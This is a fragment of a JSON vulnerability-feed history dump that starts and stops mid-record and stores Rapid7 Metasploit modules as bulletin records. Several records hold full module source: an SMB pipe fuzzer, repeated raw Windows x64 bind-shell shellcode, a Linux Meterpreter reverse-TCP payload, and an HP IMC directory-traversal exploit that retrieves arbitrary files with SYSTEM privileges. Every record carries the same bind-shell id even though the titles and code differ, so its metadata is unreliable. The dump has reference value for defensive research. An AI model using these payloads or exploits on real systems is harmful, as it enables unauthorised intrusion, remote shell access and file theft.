"sourceHref", "title"], "edition": 5}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "eb14729aed2e05ae2710c3d90c7796de", "type": "metasploit", "bulletinFamily": "exploit", "title": "SMB Create Pipe Request Fuzzer", "description": "This module sends a series of SMB create pipe requests using malicious strings.\n", "published": "2009-10-25T05:05:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-19T13:32:51", "history": [], "viewCount": 18, "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2019-06-19T13:32:51"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:998955151150716619", "KITPLOIT:8104288151939526503"]}, {"type": "thn", "idList": ["THN:9CC3E667EC316D78F27C05405A91663B"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994608"]}, {"type": "exploitdb", "idList": ["EDB-ID:47011", "EDB-ID:47010", "EDB-ID:47006", "EDB-ID:47007", "EDB-ID:47005"]}, {"type": "zdt", "idList": ["1337DAY-ID-32887", "1337DAY-ID-32872", "1337DAY-ID-32870", "1337DAY-ID-32880", "1337DAY-ID-32881"]}, {"type": "redhat", "idList": ["RHSA-2019:1527"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:7B6D8A3548EA65E29D90ED78BFF8C14D"]}, {"type": "threatpost", "idList": ["THREATPOST:93C6C6F1F74B11C3D7F109589684DAED", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153332", "PACKETSTORM:153330"]}], "modified": "2019-06-19T13:32:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Auxiliary::Fuzzer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB Create Pipe Request Fuzzer',\n 'Description' => %q{\n This module sends a series of SMB create pipe\n requests using malicious strings.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE\n ))\n end\n\n def do_smb_create(pkt,opts={})\n @connected = false\n connect\n smb_login\n @connected = true\n smb_create(\"\\\\\" + pkt)\n end\n\n def run\n last_str = nil\n last_inp = nil\n last_err = nil\n\n cnt = 0\n\n fuzz_strings do |str|\n cnt += 1\n\n if(cnt % 100 == 0)\n print_status(\"Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}\")\n end\n\n begin\n do_smb_create(str, 0.25)\n rescue ::Interrupt\n print_status(\"Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}\")\n raise $!\n rescue ::Exception => e\n last_err = e\n ensure\n disconnect\n end\n\n if(not @connected)\n if(last_str)\n print_status(\"The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack(\"H*\")[0]} error=#{last_err}\")\n else\n print_status(\"Could not connect to the service: #{last_err}\")\n end\n return\n end\n\n last_str = str\n last_inp = @last_fuzzer_input\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-19T13:32:51", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 6}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-19T19:07:29", "history": [], "viewCount": 18, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2019-06-19T19:07:29"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:515CD17353FD69BC2811599574546F0A", "THN:9CC3E667EC316D78F27C05405A91663B"]}, {"type": "kitploit", "idList": ["KITPLOIT:998955151150716619", "KITPLOIT:1781289439619762932", "KITPLOIT:8104288151939526503"]}, {"type": "exploitdb", "idList": ["EDB-ID:47011", "EDB-ID:47010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994608"]}, {"type": "zdt", "idList": ["1337DAY-ID-32887", "1337DAY-ID-32886", "1337DAY-ID-32872", "1337DAY-ID-32871", "1337DAY-ID-32870", "1337DAY-ID-32880", "1337DAY-ID-32881"]}, {"type": "redhat", "idList": ["RHSA-2019:1527"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:7B6D8A3548EA65E29D90ED78BFF8C14D"]}, {"type": "threatpost", "idList": ["THREATPOST:93C6C6F1F74B11C3D7F109589684DAED", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819"]}, {"type": "cve", "idList": ["CVE-2019-7588"]}], "modified": "2019-06-19T19:07:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-19T19:07:29", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 7}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "e87cacf733cce3c6da8f435a6d8070ca", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Meterpreter, Reverse TCP Inline", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "published": "2017-03-21T09:38:18", "modified": "2019-05-21T17:40:27", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T17:48:35", "history": [], "viewCount": 18, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2019-06-19T19:07:29"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:515CD17353FD69BC2811599574546F0A", "THN:9CC3E667EC316D78F27C05405A91663B"]}, {"type": "kitploit", "idList": ["KITPLOIT:998955151150716619", "KITPLOIT:1781289439619762932", "KITPLOIT:8104288151939526503"]}, {"type": "exploitdb", "idList": ["EDB-ID:47011", "EDB-ID:47010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994608"]}, {"type": "zdt", "idList": ["1337DAY-ID-32887", "1337DAY-ID-32886", "1337DAY-ID-32872", "1337DAY-ID-32871", "1337DAY-ID-32870", "1337DAY-ID-32880", "1337DAY-ID-32881"]}, {"type": "redhat", "idList": ["RHSA-2019:1527"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:7B6D8A3548EA65E29D90ED78BFF8C14D"]}, {"type": "threatpost", "idList": ["THREATPOST:93C6C6F1F74B11C3D7F109589684DAED", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819"]}, {"type": "cve", "idList": ["CVE-2019-7588"]}], "modified": "2019-06-19T19:07:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_ppc64le_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1236640\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse TCP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_PPC64LE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'tcp',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T17:48:35", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 8}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-10T20:45:43", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-07-10T20:45:43"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "exploitdb", "idList": ["EDB-ID:47095", "EDB-ID:47100", "EDB-ID:47091", "EDB-ID:47099", "EDB-ID:47093", "EDB-ID:47088", "EDB-ID:47096", "EDB-ID:47090", "EDB-ID:47089", "EDB-ID:47101"]}], "modified": "2019-07-10T20:45:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-10T20:45:43", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 9}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "5e4dab86e963d1fbc570bb39cf565021", "type": "metasploit", "bulletinFamily": "exploit", "title": "HP Intelligent Management BIMS DownloadServlet Directory Traversal", "description": "This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the DownloadServlet from the BIMS component, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201 over Windows 2003 SP2.\n", "published": "2013-10-19T05:27:57", "modified": "2017-07-24T13:26:21", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4823"], "cvelist": ["CVE-2013-4823"], "lastseen": "2019-07-15T16:46:39", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2019-07-15T16:46:39"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4823"]}, {"type": "nessus", "idList": ["HP_IMC_WEB_BIMS_FILE_DOWNLOAD.NASL", "HP_IMC_BIMS_52_E401.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/HP_IMC_BIMS_DOWNLOADSERVLET_TRAVERSAL"]}, {"type": "zdi", "idList": ["ZDI-13-239"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29906", "SECURITYVULNS:VULN:13339"]}], "modified": "2019-07-15T16:46:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Intelligent Management BIMS DownloadServlet Directory Traversal',\n 'Description' => %q{\n This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the DownloadServlet from the BIMS component,\n in order to retrieve arbitrary files with SYSTEM privileges. This module has been\n tested successfully on HP Intelligent Management Center 5.1 E0202 with BIMS 5.1 E0201\n over Windows 2003 SP2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-4823' ],\n [ 'OSVDB', '98248' ],\n [ 'BID', '62897' ],\n [ 'ZDI', '13-239' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),\n OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\\\win.ini']),\n # By default files downloaded from C:\\Program Files\\iMC\\client\\web\\apps\\imc\\\n OptInt.new('DEPTH', [true, 'Traversal depth', 6])\n ])\n end\n\n def is_imc?\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, \"login.jsf\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/\n return true\n else\n return false\n end\n end\n\n def my_basename(filename)\n return ::File.basename(filename.gsub(/\\\\/, \"/\"))\n end\n\n def run_host(ip)\n\n if not is_imc?\n vprint_error(\"#{rhost}:#{rport} - This isn't a HP Intelligent Management Center\")\n return\n end\n\n travs = \"\"\n travs << \"../\" * datastore['DEPTH']\n travs << datastore['FILEPATH']\n\n vprint_status(\"#{rhost}:#{rport} - Sending request...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, \"bimsDownload\"),\n 'method' => 'GET',\n 'vars_get' =>\n {\n 'fileName' => travs,\n 'path' => \"/\"\n }\n })\n\n if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == \"application/doc\"\n contents = res.body\n fname = my_basename(datastore['FILEPATH'])\n path = store_loot(\n 'hp.imc.bimsdownloadservlet',\n 'application/octet-stream',\n ip,\n contents,\n fname\n )\n print_good(\"#{rhost}:#{rport} - File saved in: #{path}\")\n else\n vprint_error(\"#{rhost}:#{rport} - Failed to retrieve file\")\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-15T16:46:39", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 10}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-16T19:32:29", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2019-07-16T19:32:29"}, "dependencies": {"references": [{"type": "krebs", "idList": ["KREBS:661A2358CE98AADA25B465111B278530"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6"]}, {"type": "exploitdb", "idList": ["EDB-ID:47128", "EDB-ID:47125", "EDB-ID:47126", "EDB-ID:47122", "EDB-ID:47127"]}, {"type": "kitploit", "idList": ["KITPLOIT:4550420346351142378"]}, {"type": "threatpost", "idList": ["THREATPOST:42C95C0549D8E60C5A45CCC219C5CFC8"]}, {"type": "lenovo", "idList": ["LENOVO:PS500262-NOSID"]}, {"type": "cve", "idList": ["CVE-2019-1073", "CVE-2019-1100", "CVE-2019-1132", "CVE-2019-1130", "CVE-2019-1094", "CVE-2019-1089", "CVE-2019-0966", "CVE-2019-1037", "CVE-2019-1088", "CVE-2019-1086"]}], "modified": "2019-07-16T19:32:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n 